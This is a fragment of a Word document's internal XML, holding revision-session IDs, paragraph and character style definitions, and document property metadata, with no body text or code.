    <w:rsid w:val="00275376"/>
    <w:rsid w:val="00280326"/>
    <w:rsid w:val="00280D0C"/>
    <w:rsid w:val="002812E1"/>
    <w:rsid w:val="00281F8E"/>
    <w:rsid w:val="002A0FEA"/>
    <w:rsid w:val="002A396C"/>
    <w:rsid w:val="002A3C19"/>
    <w:rsid w:val="002B6484"/>
    <w:rsid w:val="002B71D3"/>
    <w:rsid w:val="002D475E"/>
    <w:rsid w:val="002F4483"/>
    <w:rsid w:val="003020A1"/>
    <w:rsid w:val="003040E7"/>
    <w:rsid w:val="00304F03"/>
    <w:rsid w:val="00306A06"/>
    <w:rsid w:val="00306A18"/>
    <w:rsid w:val="003166E6"/>
    <w:rsid w:val="003242AE"/>
    <w:rsid w:val="00335DB6"/>
    <w:rsid w:val="00345ECC"/>
    <w:rsid w:val="0035232E"/>
    <w:rsid w:val="00352726"/>
    <w:rsid w:val="00352F0B"/>
    <w:rsid w:val="003552B4"/>
    <w:rsid w:val="00360905"/>
    <w:rsid w:val="00374B3B"/>
    <w:rsid w:val="0038065E"/>
    <w:rsid w:val="00395C47"/>
    <w:rsid w:val="0039626B"/>
    <w:rsid w:val="00397068"/>
    <w:rsid w:val="003A652B"/>
    <w:rsid w:val="003A6CF3"/>
    <w:rsid w:val="003B3F5B"/>
    <w:rsid w:val="003C1B9A"/>
    <w:rsid w:val="003C28F8"/>
    <w:rsid w:val="003D0A5E"/>
    <w:rsid w:val="003D399A"/>
    <w:rsid w:val="003D684E"/>
    <w:rsid w:val="003E35F3"/>
    <w:rsid w:val="003E47BC"/>
    <w:rsid w:val="003F4588"/>
    <w:rsid w:val="003F57CC"/>
    <w:rsid w:val="003F5E14"/>
    <w:rsid w:val="004015FF"/>
    <w:rsid w:val="00402258"/>
    <w:rsid w:val="00403F88"/>
    <w:rsid w:val="00413068"/>
    <w:rsid w:val="00416382"/>
    <w:rsid w:val="00424475"/>
    <w:rsid w:val="004324EE"/>
    <w:rsid w:val="004421AF"/>
    <w:rsid w:val="00446563"/>
    <w:rsid w:val="00453E91"/>
    <w:rsid w:val="004577F4"/>
    <w:rsid w:val="0046272A"/>
    <w:rsid w:val="00467BB1"/>
    <w:rsid w:val="00467CE3"/>
    <w:rsid w:val="004751E9"/>
    <w:rsid w:val="004A186E"/>
    <w:rsid w:val="004B3933"/>
    <w:rsid w:val="004B6BA7"/>
    <w:rsid w:val="004B6C74"/>
    <w:rsid w:val="004C4322"/>
    <w:rsid w:val="004C7D0F"/>
    <w:rsid w:val="004E1315"/>
    <w:rsid w:val="004F4E03"/>
    <w:rsid w:val="0050563B"/>
    <w:rsid w:val="0051626A"/>
    <w:rsid w:val="005245D1"/>
    <w:rsid w:val="0053490A"/>
    <w:rsid w:val="00553BC6"/>
    <w:rsid w:val="00554715"/>
    <w:rsid w:val="00556196"/>
    <w:rsid w:val="00557F08"/>
    <w:rsid w:val="005603E5"/>
    <w:rsid w:val="00583ED4"/>
    <w:rsid w:val="00592652"/>
    <w:rsid w:val="0059791E"/>
    <w:rsid w:val="005B2210"/>
    <w:rsid w:val="005D69EC"/>
    <w:rsid w:val="005F0233"/>
    <w:rsid w:val="005F4353"/>
    <w:rsid w:val="00601FA0"/>
    <w:rsid w:val="00606AEB"/>
    <w:rsid w:val="006071B0"/>
    <w:rsid w:val="00613437"/>
    <w:rsid w:val="00622C2A"/>
    <w:rsid w:val="0063112D"/>
    <w:rsid w:val="006314E3"/>
    <w:rsid w:val="006323EA"/>
    <w:rsid w:val="00632853"/>
    <w:rsid w:val="0063537A"/>
    <w:rsid w:val="006473A7"/>
    <w:rsid w:val="0065749E"/>
    <w:rsid w:val="00660232"/>
    <w:rsid w:val="00660C9F"/>
    <w:rsid w:val="006625F0"/>
    <w:rsid w:val="00670919"/>
    <w:rsid w:val="00671E03"/>
    <w:rsid w:val="006723B0"/>
    <w:rsid w:val="00676C2D"/>
    <w:rsid w:val="00684EB2"/>
    <w:rsid w:val="00686BFA"/>
    <w:rsid w:val="00691E2B"/>
    <w:rsid w:val="006930CC"/>
    <w:rsid w:val="00694B26"/>
    <w:rsid w:val="006C3B36"/>
    <w:rsid w:val="006D69ED"/>
    <w:rsid w:val="006E2E8B"/>
    <w:rsid w:val="006E6F0F"/>
    <w:rsid w:val="006F1166"/>
    <w:rsid w:val="006F19D2"/>
    <w:rsid w:val="00704B98"/>
    <w:rsid w:val="0071184D"/>
    <w:rsid w:val="00715274"/>
    <w:rsid w:val="007265BA"/>
    <w:rsid w:val="00736D83"/>
    <w:rsid w:val="0076501B"/>
    <w:rsid w:val="007677EE"/>
    <w:rsid w:val="0077641C"/>
    <w:rsid w:val="007A0F80"/>
    <w:rsid w:val="007A4103"/>
    <w:rsid w:val="007A41D0"/>
    <w:rsid w:val="007A65BF"/>
    <w:rsid w:val="007B2846"/>
    <w:rsid w:val="007B5889"/>
    <w:rsid w:val="007C524D"/>
    <w:rsid w:val="007E2276"/>
    <w:rsid w:val="007F760C"/>
    <w:rsid w:val="00800A6F"/>
    <w:rsid w:val="00806D80"/>
    <w:rsid w:val="00811606"/>
    <w:rsid w:val="00843787"/>
    <w:rsid w:val="00847B3B"/>
    <w:rsid w:val="0085471B"/>
    <w:rsid w:val="008563E4"/>
    <w:rsid w:val="00862752"/>
    <w:rsid w:val="00880F8A"/>
    <w:rsid w:val="00887C14"/>
    <w:rsid w:val="00896B77"/>
    <w:rsid w:val="008A5D6A"/>
    <w:rsid w:val="008A6657"/>
    <w:rsid w:val="008A6ACE"/>
    <w:rsid w:val="008C07C7"/>
    <w:rsid w:val="008F3EDA"/>
    <w:rsid w:val="009040DB"/>
    <w:rsid w:val="00913B1A"/>
    <w:rsid w:val="009429BD"/>
    <w:rsid w:val="00943D84"/>
    <w:rsid w:val="00944CE7"/>
    <w:rsid w:val="00950AB3"/>
    <w:rsid w:val="00956469"/>
    <w:rsid w:val="009573E0"/>
    <w:rsid w:val="009644E3"/>
    <w:rsid w:val="00987A9E"/>
    <w:rsid w:val="0099026D"/>
    <w:rsid w:val="009B31A7"/>
    <w:rsid w:val="009B721A"/>
    <w:rsid w:val="009C309A"/>
    <w:rsid w:val="009C3755"/>
    <w:rsid w:val="009C4EBF"/>
    <w:rsid w:val="009C5D29"/>
    <w:rsid w:val="009D06C9"/>
    <w:rsid w:val="009D3E78"/>
    <w:rsid w:val="009D6956"/>
    <w:rsid w:val="009F1991"/>
    <w:rsid w:val="009F67FD"/>
    <w:rsid w:val="00A07D5B"/>
    <w:rsid w:val="00A1237B"/>
    <w:rsid w:val="00A2058C"/>
    <w:rsid w:val="00A20953"/>
    <w:rsid w:val="00A32323"/>
    <w:rsid w:val="00A407C4"/>
    <w:rsid w:val="00A50AE2"/>
    <w:rsid w:val="00A5157C"/>
    <w:rsid w:val="00A67CE2"/>
    <w:rsid w:val="00A878A6"/>
    <w:rsid w:val="00A90A9E"/>
    <w:rsid w:val="00A9797E"/>
    <w:rsid w:val="00AA4905"/>
    <w:rsid w:val="00AA6275"/>
    <w:rsid w:val="00AB044C"/>
    <w:rsid w:val="00AB1927"/>
    <w:rsid w:val="00AB56F9"/>
    <w:rsid w:val="00AB5722"/>
    <w:rsid w:val="00AB63BE"/>
    <w:rsid w:val="00AB75B3"/>
    <w:rsid w:val="00AC2559"/>
    <w:rsid w:val="00AC37D7"/>
    <w:rsid w:val="00AD28BD"/>
    <w:rsid w:val="00AD4A62"/>
    <w:rsid w:val="00AD4DF8"/>
    <w:rsid w:val="00AE563C"/>
    <w:rsid w:val="00AE6D6F"/>
    <w:rsid w:val="00AE772A"/>
    <w:rsid w:val="00AF41E5"/>
    <w:rsid w:val="00AF6BFF"/>
    <w:rsid w:val="00B02CEC"/>
    <w:rsid w:val="00B06F1D"/>
    <w:rsid w:val="00B1061D"/>
    <w:rsid w:val="00B223EB"/>
    <w:rsid w:val="00B315BA"/>
    <w:rsid w:val="00B33755"/>
    <w:rsid w:val="00B64108"/>
    <w:rsid w:val="00B728CC"/>
    <w:rsid w:val="00B83C6E"/>
    <w:rsid w:val="00B84485"/>
    <w:rsid w:val="00B87D76"/>
    <w:rsid w:val="00BA3DE7"/>
    <w:rsid w:val="00BB5315"/>
    <w:rsid w:val="00BC52F7"/>
    <w:rsid w:val="00BC75C0"/>
    <w:rsid w:val="00BD0AE3"/>
    <w:rsid w:val="00BD414E"/>
    <w:rsid w:val="00BE6F69"/>
    <w:rsid w:val="00BF7022"/>
    <w:rsid w:val="00C015CB"/>
    <w:rsid w:val="00C048BE"/>
    <w:rsid w:val="00C14DF8"/>
    <w:rsid w:val="00C314BE"/>
    <w:rsid w:val="00C341D9"/>
    <w:rsid w:val="00C360E1"/>
    <w:rsid w:val="00C52C79"/>
    <w:rsid w:val="00C55DAC"/>
    <w:rsid w:val="00C56857"/>
    <w:rsid w:val="00C62519"/>
    <w:rsid w:val="00C6540C"/>
    <w:rsid w:val="00C71955"/>
    <w:rsid w:val="00C73F6E"/>
    <w:rsid w:val="00C7606A"/>
    <w:rsid w:val="00C770D6"/>
    <w:rsid w:val="00C777A0"/>
    <w:rsid w:val="00C83252"/>
    <w:rsid w:val="00C917B2"/>
    <w:rsid w:val="00C93774"/>
    <w:rsid w:val="00CA3A57"/>
    <w:rsid w:val="00CC17F1"/>
    <w:rsid w:val="00CC25D2"/>
    <w:rsid w:val="00CC413D"/>
    <w:rsid w:val="00CC4BAD"/>
    <w:rsid w:val="00CC5EDB"/>
    <w:rsid w:val="00CD538E"/>
    <w:rsid w:val="00CD6CF1"/>
    <w:rsid w:val="00CD6CF3"/>
    <w:rsid w:val="00CE2905"/>
    <w:rsid w:val="00CF4E30"/>
    <w:rsid w:val="00CF5FB0"/>
    <w:rsid w:val="00D02320"/>
    <w:rsid w:val="00D03CCD"/>
    <w:rsid w:val="00D04CAE"/>
    <w:rsid w:val="00D052DD"/>
    <w:rsid w:val="00D173C7"/>
    <w:rsid w:val="00D22C33"/>
    <w:rsid w:val="00D42CD4"/>
    <w:rsid w:val="00D44068"/>
    <w:rsid w:val="00D5105A"/>
    <w:rsid w:val="00D539ED"/>
    <w:rsid w:val="00D57BC5"/>
    <w:rsid w:val="00D57FB8"/>
    <w:rsid w:val="00D763E2"/>
    <w:rsid w:val="00D77453"/>
    <w:rsid w:val="00D8256E"/>
    <w:rsid w:val="00D969CE"/>
    <w:rsid w:val="00DA5219"/>
    <w:rsid w:val="00DB37E4"/>
    <w:rsid w:val="00DC4F7D"/>
    <w:rsid w:val="00DF5E46"/>
    <w:rsid w:val="00E0646E"/>
    <w:rsid w:val="00E06CCA"/>
    <w:rsid w:val="00E12274"/>
    <w:rsid w:val="00E123B3"/>
    <w:rsid w:val="00E15D45"/>
    <w:rsid w:val="00E215F9"/>
    <w:rsid w:val="00E226A6"/>
    <w:rsid w:val="00E27584"/>
    <w:rsid w:val="00E363FE"/>
    <w:rsid w:val="00E42995"/>
    <w:rsid w:val="00E51366"/>
    <w:rsid w:val="00E52526"/>
    <w:rsid w:val="00E60B60"/>
    <w:rsid w:val="00E625A2"/>
    <w:rsid w:val="00E711CA"/>
    <w:rsid w:val="00E76566"/>
    <w:rsid w:val="00E8068F"/>
    <w:rsid w:val="00E82BDE"/>
    <w:rsid w:val="00E8732D"/>
    <w:rsid w:val="00E94E2C"/>
    <w:rsid w:val="00EA100D"/>
    <w:rsid w:val="00EA51C0"/>
    <w:rsid w:val="00EB0EC6"/>
    <w:rsid w:val="00EB6161"/>
    <w:rsid w:val="00EB69DE"/>
    <w:rsid w:val="00ED7608"/>
    <w:rsid w:val="00F15DA5"/>
    <w:rsid w:val="00F20DEE"/>
    <w:rsid w:val="00F22648"/>
    <w:rsid w:val="00F3036B"/>
    <w:rsid w:val="00F33FC3"/>
    <w:rsid w:val="00F347B3"/>
    <w:rsid w:val="00F35143"/>
    <w:rsid w:val="00F41B33"/>
    <w:rsid w:val="00F43689"/>
    <w:rsid w:val="00F466BC"/>
    <w:rsid w:val="00F54574"/>
    <w:rsid w:val="00F54EE5"/>
    <w:rsid w:val="00F56BD0"/>
    <w:rsid w:val="00F613FE"/>
    <w:rsid w:val="00F70A90"/>
    <w:rsid w:val="00F75487"/>
    <w:rsid w:val="00F8266D"/>
    <w:rsid w:val="00F96FA2"/>
    <w:rsid w:val="00FA5F72"/>
    <w:rsid w:val="00FC0907"/>
    <w:rsid w:val="00FD2CFA"/>
    <w:rsid w:val="00FD7F96"/>
    <w:rsid w:val="00FE26FB"/>
    <w:rsid w:val="00FE5AFD"/>
    <w:rsid w:val="00FF50F7"/>
    <w:rsid w:val="00FF71F0"/>
    <w:rsid w:val="00FF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43A2D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5E529EBF-2059-4AF6-9838-E14B6C95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99A"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00B84485"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:kern w:val="2"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001C68E0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003552B4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002116F5"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:iCs/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003D399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D399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399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399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399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485"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsia="Times New Roman" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="27"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001C68E0"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00224E8A"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="4" w:color="4472C4" w:themeColor="accent1"/>
      </w:pBdr>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24E8A"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003552B4"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:sz w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002116F5"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:iCs/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00224E8A"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI"/>
      <w:color w:val="0000FF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Abstract">
    <w:name w:val="Abstract"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00107676"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE6D6F"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00AE6D6F"/>
    <w:rPr>
      <w:rFonts w:ascii="Yu Gothic" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Yu Gothic"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003D399A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003D399A"/>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3D399A"/>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3D399A"/>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3D399A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="003D399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99A"/>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3D39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399A"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003D399A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003D399A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003D39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399A"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003D39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1852</Words>
  <Characters>10562</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>88</Lines>
  <Paragraphs>24</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12390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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-05T15:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-05T15:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>